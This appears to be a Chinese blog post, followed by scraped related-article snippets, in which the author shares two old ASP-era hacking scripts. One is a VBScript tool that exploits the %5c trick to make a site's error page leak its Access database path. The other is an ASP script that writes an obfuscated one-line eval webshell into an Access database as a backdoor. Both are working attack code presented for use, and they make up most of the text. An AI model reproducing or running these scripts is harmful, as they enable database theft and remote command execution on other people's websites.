N年前的两个脚本%5c暴库_vbs

Dim xStatus,tStatus,vServer,vHeader,vRsBody
GetError=InputBox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")
If GetError = "" Then
MsgBox("输入错误,程序结束!")
WScript.Quit
End If

GetError=StrReverse(GetError)
Tem2=0
For I=1 To Len(GetError)
If Mid(GetError,I,1) = Chr(47) And Tem2=0 Then
Temp=Temp & "c5%"
Tem2=Tem2+1
Else
Temp=Temp & Mid(GetError,I,1)
End If
Next
GetError=StrReverse(Temp)

Call xmlPost(GetError)
ErrorText = vServer & " " & xStatus
BaseSaver = GetStr(vRsBody,"找不到文件 '","'。</font>" & Chr(10))
If BaseSaver="[None]" Then
BaseSaver = GetStr(vRsBody,"<font face="&Chr(34)&"宋体"&Chr(34)&" size=2>'","'不是一个有效的路径。")
End If
If BaseSaver="[None]" Then
BaseSaver = GetStr(vRsBody,"打开注册表关键字 '","'。</font>")
End If

If BaseSaver = "[None]" Then
AllReturn= "<TITLE>Mappath出错获取数据库地址 Lilo</TITLE><Body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><B>" & ErrorText & "</B><BR><BR><textarea rows='15' name='S1' cols='57'>" &vRsBody& "</textarea>"
Else
AllReturn= "<TITLE>Mappath出错获取数据库地址 Lilo</TITLE><Body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><B>" & ErrorText & "</B><BR><BR><textarea rows='15' name='S1' cols='57'>" &BaseSaver& "</textarea>"
End If

Call OpenWin(AllReturn)
Set WHShell = WScript.CreateObject("WScript.Shell")
WHShell.AppActivate "Mappath出错获取数据库地址 Lilo"
'WHShell.SendKeys ("%{TAB}")
Set WHShell = Nothing

Function URLEncoding(vstrIn)
strReturn = ""
For i = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,i,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00)\ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function

Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function

Function xmlPost(iURL)
On Error Resume Next
iPost=URLEncoding(iPost)
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.open "POST",iURL,False
xPost.Send
xStatus = xPost.Status
tStatus = xPost.StatusText
vServer = xPost.GetResponseHeader("Server")
vHeader = xPost.GetAllResponseHeaders
vRsBody = bytes2BSTR(xPost.responseBody)
Set xPost = Nothing
End Function

Function GetStr(vString,iString,dString)
vSum = inStr(vRsBody,iString)
If vSum = 0 Then GetStr="[None]" : Exit Function
eSum = inStr(vSum,vRsBody,dString)
If eSum = 0 Then GetStr="[None]" : Exit Function
GetStr = Mid(vRsBody,vSum+Len(iString),eSum-vSum-Len(iString))
End Function

Function IntToStr(vNum,vLen)
If Len(vNum) >= vLen Then IntToStr = vNum : Exit Function
For I=1 To vLen-Len(vNum)
IntToStr=IntToStr & "0"
Next
IntToStr = IntToStr & CStr(vNum)
End Function

Function GetSplit(unStr,vaStr,Mode)
aTemp = Split(unStr,vaStr)
bTemp = Ubound(aTemp)
Select Case Mode
Case -1: GetSplit = aTemp
Case -2: GetSplit = bTemp
End Select
If Mode < 0 Then Exit Function
If Mode > bTemp Then GetSplit=False : Exit Function
If Mode >= 0 Then GetSplit = aTemp(Mode)
End Function

Function OpenWin(vTTv)
Set IE = WScript.CreateObject("InternetExplorer.Application")
IE.Navigate "about:blank"
IE.Visible = 1 
IE.ToolBar = 0
IE.StatusBar = 0
IE.Width=500
IE.Height=335
Do While (IE.Busy): Loop
Set Doc = IE.Document
Doc.Open
Execute "Doc.Writeln " & Chr(34) & vTTv & Chr(34)
Doc.Close
Set IE=Nothing
End Function

另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知其他人有没有更早提前发现的。后来网上就流传开直接向数据库插入一句话来得到webshell。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?

<%

db="0123.asp" '这里改成您的数据库地址
set conn=server.createobject("Adodb.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(db)
conn.open connstr
'添加notdownload表
conn.execute("create table notdownload(notdown oleobject)")
'写入<%数据
set rs=server.createobject("adodb.recordset")
    sql="select * from notdownload"
rs.open sql,conn,1,3
rs.addnew
    rs("notdown").appendchunk(chrB(asc("<")) & chrB(asc("s")) & chrB(asc("c"))& chrB(asc("r")) & chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(" "))& chrB(asc("r"))& chrB(asc("u"))& chrB(asc("n"))& chrB(asc("a"))& chrB(asc("t"))& chrB(asc("="))& chrB(asc("s"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc("v"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc(" "))& chrB(asc("l"))& chrB(asc("a"))& chrB(asc("n"))& chrB(asc("g"))& chrB(asc("u"))& chrB(asc("a"))& chrB(asc("g"))& chrB(asc("e"))& chrB(asc("="))& chrB(asc("j"))& chrB(asc("a"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">"))& chrB(asc("e"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("l"))& chrB(asc("("))& chrB(asc("r"))& chrB(asc("e"))& chrB(asc("q"))& chrB(asc("u"))& chrB(asc("e"))& chrB(asc("s"))& chrB(asc("t"))& chrB(asc("."))& chrB(asc("f"))& chrB(asc("o"))& chrB(asc("r"))& chrB(asc("m"))& chrB(asc("("))& chrB(asc("'"))& chrB(asc("#"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("+"))& chrB(asc("'"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("<"))& chrB(asc("/"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">")))
    rs.update
    rs.close
set rs=nothing
'关闭连接
conn.close
set conn=nothing
%>

时间: 2024-10-03 20:56:10

N年前的两个脚本%5c暴库_vbs的相关文章

网络暴库,曝的是谁的“底裤”?

   2011年的年终岁尾,必须要说的网络贺岁大片,当属以CSDN社区为代表的诸多国内网站被"暴库"的暴力灾难片.该片一"公映",就引起各方强烈关注, 一时间,愤怒声讨的,辟谣声明的,道歉报警的,忧国忧民的,戏说恶搞的,把年末本来就十分喧嚣的网络更是升温到了沸腾.唯物辩证法教育我们,凡事要透过现 象看本质.那么,拨开纷纷扰扰,透过飘飘渺渺,这疯狂大"暴库",到底暴露了谁的"底裤"?      首先,暴库暴露了网络监管的底裤.&

数据库暴库整理篇

数据|数据库 数据库暴库整理篇 转:影子鹰安全网 引子:昨天和animator试验了一下,把data.mdb文件改名为data.asp文件后放在wwwroot目录里.然后在IE中输入data.asp路径后,发现IE显示一片空白,右键->察看源文件,跳出记事本,将内容另存为.mdb文件,用ACCESS打开,发现需要密码,也就是说至少文件头被破坏.  然后用Flashget试验下载data.asp文件,并另存为data.mdb文件,发现用ACCESS打开完好无损!!!看来,好一些编程人员在开发的时候

db2 同一台机器下不同实例的两个完全相同的库怎么区分

问题描述 db2 同一台机器下不同实例的两个完全相同的库怎么区分 刚刚把实例A下的一个库restore到了一个新的实例B下,库的名称什么都全都没变,我现在要怎在程序中区分连接两个库呢,两个实例是同一个环境下 新手有点白 麻烦懂的大神帮帮忙

MY动力系统“暴库”漏洞十年未除 360发布解决方案

中介交易 SEO诊断 淘宝客 云主机 技术大厅 在网站漏洞中,有些如流星般只存在几小时或几天即被修复,而有些漏洞存在10年仍未根除.近日,360网站安全检测平台通过对旗下用户的"老漏洞"专项扫描发现,有233家网站存在"MY动力系统'暴库'漏洞",占所有使用"MY动力系统"网站的84%.这一存在近10年的漏洞可能导致数据库地址流出,进而造成网站用户隐私泄露等严重问题. 360网站安全检测平台:http://webscan.360.cn "

创建dblink的两个脚本。

由于自己的主机的ip是dhcp获取的,ip在每次重启电脑的时候就会改变,所以写了两个创建dblink的脚本,一个shell需要输入要创建dblink 名称,远程主机的ip地址和数据库的服务名serive_name,缺点是还有手动填写ip地址.======createdblink.sh========== #!/bin/bash DBLINK =$1 IPADD =$2 SERVICE_NAME function usage(){ echo "Usage: `basename $0 ` DB_LI

linxu中每天自动备份mysql两段脚本

定时执行脚本: 执行  代码如下 复制代码 crontab -e 00 00 * * * /bin/bash yourpath/mysqlbak.sh 打开自动执行文件    代码如下 复制代码 vi /etc/crontab 在etc中加入如下内容,让其自动执行任务.  代码如下 复制代码 00 00 * * * root /mysqlbak.sh 以上两个 00    00    *    *    *  为每天的凌晨自动执行脚本 分 时 日 月 周 命令 M: 分钟(0-59).每分钟用*

检查linux网络状态的两个脚本_linux shell

一.通过定时收发email检测网络连通性 复制代码 代码如下: #/bin/bashecho "Daily test mail" > state.txtmail -s Server_State abc@jb51.net < state.txtrm -df ./state.txt ~                         crontab -e增加如下任务10 07 * * * /root/checkNKmail &分时日月周 二.定时检测网络状态通过emai

[导入][原创]用脚本控制迅雷下载_vbs

一个网上的朋友想用脚本调用迅雷下载,于是我研究了一下,觉得可以,弄出来跟大家分享 首先呢,找到迅雷在IE右健添加的东东:"用迅雷下载链接".于是打开注册表,运行regedit,选中项,HKEY_CURRENT_USER\Software\Microsoft 查找:"迅雷".结果出来了,放在 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt ,然后在右边的窗口发现了两个文件:geturl.ht

运行脚本之前,如何确定计算机上的默认脚本宿主的代码_vbs

问: 您好,脚本专家!我知道,在运行脚本时,可使用代码确定脚本是否在 WScript 或 CScript 中运行.但我想不明白的是:运行脚本之前,如何确定计算机上的默认脚本宿主? -- AT 答: 您好,AT.您知道,人们完全难倒脚本专家并不是常事:不过我们不得不承认这个问题的确有点挑战性.(嗯,嗯:那么,或许它并不足以能够难倒脚本专家:老实说,事实上它相当简单.不过你们无需知道这些.)我们还不知道如何回答这个问题,但我们知道,为了帮助您解决这个问题,我们将会需要大量辛勤的工作和奉献. 但是,在